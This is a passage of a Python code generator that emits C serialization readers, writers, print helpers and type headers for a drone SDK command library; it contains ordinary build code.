cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddDoubleToBuffer') + ' (uint8_t *buffer, double newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' union {\n')
cfile.write (' double d;\n')
cfile.write (' uint64_t u64;\n')
cfile.write (' } val = { .d = newVal };\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (buffer, val.u64, oldOffset, buffCap);\n')
cfile.write ('}\n')
cfile.write ('\n')
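# Note: all Add*ToBuffer writers generated above share one contract: convert multi-byte
# values to device byte order (htodl/htodll), memcpy them at oldOffset, and return the
# new offset, or -1 when buffCap is too small. Illustrative shape of the generated C
# (actual names come from ARFunctionName and may differ):
#   int32_t ARCOMMANDS_ReadWrite_AddU32ToBuffer (uint8_t *buffer, uint32_t newVal,
#                                                int32_t oldOffset, int32_t buffCap);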
cfile.write ('// ------- //\n')
cfile.write ('// READERS //\n')
cfile.write ('// ------- //\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
cfile.write ('// Read an 8 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint8_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint8_t retVal = 0;\n')
cfile.write (' int newOffset = *offset + sizeof (uint8_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = buffer [*offset];\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
cfile.write ('// Read a 16 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint16_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint16_t retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (uint16_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint16_t));\n')
cfile.write (' retVal = dtohs (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
cfile.write ('// Read a 32 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint32_t retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (uint32_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint32_t));\n')
cfile.write (' retVal = dtohl (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64]:
cfile.write ('// Read a 64 bit value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('uint64_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' uint64_t retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (uint64_t);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (uint64_t));\n')
cfile.write (' retVal = dtohll (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
cfile.write ('// Read a float value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('float ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' float retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (float);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (float));\n')
cfile.write (' retVal = dtohf (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Read a double value from the buffer\n')
cfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
cfile.write ('double ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' double retVal = 0;\n')
cfile.write (' const uint8_t *buffAddr = &buffer[*offset];\n')
cfile.write (' int newOffset = *offset + sizeof (double);\n')
cfile.write (' if (newOffset > capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' memcpy (&retVal, buffAddr, sizeof (double));\n')
cfile.write (' retVal = dtohd (retVal);\n')
cfile.write (' *offset = newOffset;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
cfile.write ('// Read a string value from the buffer\n')
cfile.write ('// On error, return NULL and set *error to 1, else set *error to 0\n')
cfile.write ('const char* ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' const char *retVal = NULL;\n')
cfile.write (' const char *buffAddr = (char *)&buffer[*offset];\n')
cfile.write (' int newOffset = *offset;\n')
cfile.write (' while ((newOffset < capacity) && (\'\\0\' != (char) buffer [newOffset]))\n')
cfile.write (' {\n')
cfile.write (' newOffset += sizeof (char);\n')
cfile.write (' }\n')
cfile.write (' if (newOffset >= capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = buffAddr;\n')
cfile.write (' *offset = newOffset + 1;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
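# Note: the Read*FromBuffer readers generated above mirror the writers: they convert from
# device byte order (dtohs/dtohl/dtohll/dtohf/dtohd) and advance *offset only on success,
# reporting failures through *error. Hedged usage sketch of the generated C (names are
# illustrative, produced by ARFunctionName):
#   int32_t offset = 0, err = 0;
#   uint32_t v = ARCOMMANDS_ReadWrite_Read32FromBuffer (buffer, buffLen, &offset, &err);
#   if (err) { /* not enough data in the buffer */ }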
cfile.write ('// -------- //\n')
cfile.write ('// TOSTRING //\n')
cfile.write ('// -------- //\n')
cfile.write ('\n')
if (hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8] or
hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16] or
hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or
hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or
hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.DOUBLE] or
hasArgOfType[ArArgType.STRING] or hasArgOfType[ArArgType.ENUM]):
cfile.write ('// Write a string in a buffer\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (const char *stringToWrite, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' int capacity = outputLen - outputOffset - 1;\n')
cfile.write (' int len = strlen (stringToWrite);\n')
cfile.write (' if (capacity >= len)\n')
cfile.write (' {\n')
cfile.write (' strncat (output, stringToWrite, len);\n')
cfile.write (' retVal = outputOffset + len;\n')
cfile.write (' } // No else --> If capacity is not enough, keep retVal at -1\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
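# Note: every Print* helper generated below follows the same pattern: append the argument
# name with WriteString, then snprintf the value into the remaining capacity, using the
# inttypes PRI* format when the matching HAVE_DECL_PRIxN macro is set and a plain printf
# format otherwise; -1 is returned as soon as the output string is too small.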
if hasArgOfType[ArArgType.U8]:
cfile.write ('// Write a string in a buffer from a uint8_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8') + ' (const char *name, uint8_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU8\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu8, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I8]:
cfile.write ('// Write a string in a buffer from an int8_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8') + ' (const char *name, int8_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII8\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi8, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U16]:
cfile.write ('// Write a string in a buffer from a uint16_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16') + ' (const char *name, uint16_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU16\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu16, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I16]:
cfile.write ('// Write a string in a buffer from an int16_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16') + ' (const char *name, int16_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII16\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi16, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U32]:
cfile.write ('// Write a string in a buffer from a uint32_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32') + ' (const char *name, uint32_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU32\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu32, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
cfile.write ('// Write a string in a buffer from an int32_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') + ' (const char *name, int32_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII32\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi32, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U64]:
cfile.write ('// Write a string in a buffer from a uint64_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64') + ' (const char *name, uint64_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU64\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu64, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%llu", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I64]:
cfile.write ('// Write a string in a buffer from an int64_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64') + ' (const char *name, int64_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII64\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi64, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%lld", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
cfile.write ('// Write a string in a buffer from a float arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat') + ' (const char *name, float arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%f", arg);\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Write a string in a buffer from a double arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble') + ' (const char *name, double arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%f", arg);\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
cfile.write ('// Write a string in a buffer from a string arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString') + ' (const char *name, const char *arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (arg, output, outputLen, offset);\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return offset;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.close ()
#################################
# 4TH PART : #
#################################
# Generate public Types H file #
#################################
hfile = open (paths.COMMANDSTYPES_HFILE, 'w')
hfile.write ('// ARSDK_NO_ENUM_PREPROCESS //')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSTYPES_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands types header.\n')
hfile.write (' * This file contains all type declarations needed to use commands\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSTYPES_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSTYPES_DEFINE + '\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Size of the ARCommands header.\n')
hfile.write (' * This is the minimum size of a zero-arg command.\n')
hfile.write (' * The size of a command is equal to this, plus the size\n')
hfile.write (' * of its arguments.\n')
hfile.write (' */\n')
hfile.write ('#define ' + ARMacroName (LIB_MODULE, 'HEADER', 'SIZE') + ' (4)\n')
hfile.write ('\n')
if genDebug:
hfile.write ('/**\n')
hfile.write (' * Defined only if the library includes debug commands\n')
hfile.write (' */\n')
hfile.write ('#define ' + ARMacroName (LIB_MODULE, 'HAS', 'DEBUG_COMMANDS') + ' (1)\n')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
for enum in ftr.enums:
submodules = get_ftr_old_name(ftr).upper()
macro_name = enum.name.upper()
hfile.write ('\n/**\n')
hfile.write (' * @brief ' + enum.doc.replace('\n', '\\n') + '\n')
hfile.write (' */\n')
hfile.write ('typedef enum\n')
hfile.write ('{\n')
first = True
for eVal in enum.values:
hfile.write (' ' + AREnumValue (LIB_MODULE, submodules, macro_name, eVal.name))
if eVal.value:
hfile.write (' = ' + str(eVal.value))
elif first:
hfile.write (' = 0')
hfile.write (', ///< ' + eVal.doc.replace('\n', '\\n') + '\n')
first = False
hfile.write (' ' + AREnumValue (LIB_MODULE, submodules, macro_name, 'MAX') + '\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, submodules, macro_name) + ';\n\n')
#If the enum is used as bit field
if enum.usedLikeBitfield:
#Generate bit field flags
for eVal in enum.values:
hfile.write ('#define ' + ARFlagValue (LIB_MODULE, submodules, macro_name, eVal.name) + ' (1 << '+AREnumValue (LIB_MODULE, submodules, macro_name, eVal.name)+ ') ///< ' + eVal.doc.replace('\n', '\\n') + '\n')
hfile.write ('\n')
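# For reference, each enum generated above has roughly this shape (illustrative; the real
# identifiers are produced by AREnumValue/AREnumName):
#   typedef enum
#   {
#       <LIB>_<FTR>_<ENUM>_<FIRSTVALUE> = 0,    ///< ...
#       ...
#       <LIB>_<FTR>_<ENUM>_MAX
#   } e<LIB>_<FTR>_<ENUM>;
# and enums flagged as bit fields additionally get one '#define ... (1 << enumValue)'
# flag per value.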
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
for multiset in ftr.multisets:
submodules = get_ftr_old_name(ftr)
hfile.write ('\n/**\n')
hfile.write (' * @brief ' + multiset.doc.replace('\n', '\\n') + '\n')
hfile.write (' */\n')
hfile.write ('typedef struct\n')
hfile.write ('{\n')
for msg in multiset.msgs:
hfile.write (' struct\n')
hfile.write (' {\n')
hfile.write (' uint8_t isSet;\n')
for arg in msg.args:
hfile.write (' '+xmlToC (LIB_MODULE, msg.ftr, msg, arg) +' '+arg.name+';\n')
hfile.write (' } '+msg.name+';\n')
hfile.write ('\n')
hfile.write ('} ' + ARTypeName (LIB_MODULE, submodules, multiset.name) + ';\n\n')
hfile.write ('\n')
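# For reference, each multisetting generated above becomes a struct holding one nested
# '{ uint8_t isSet; <command args>; } <msgName>;' member per command, so callers only
# fill in the commands they actually want to send (illustrative shape; the typedef name
# is produced by ARTypeName).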
hfile.write ('#endif /* ' + COMMANDSTYPES_DEFINE + ' */\n')
hfile.close ()
#################################
# 5TH PART : #
#################################
# Generate public coder H file #
#################################
hfile = open (paths.COMMANDSGEN_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSGEN_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands generator header.\n')
hfile.write (' * This file contains all declarations needed to generate commands\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSGEN_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSGEN_DEFINE + '\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions\n')
hfile.write (' */\n')
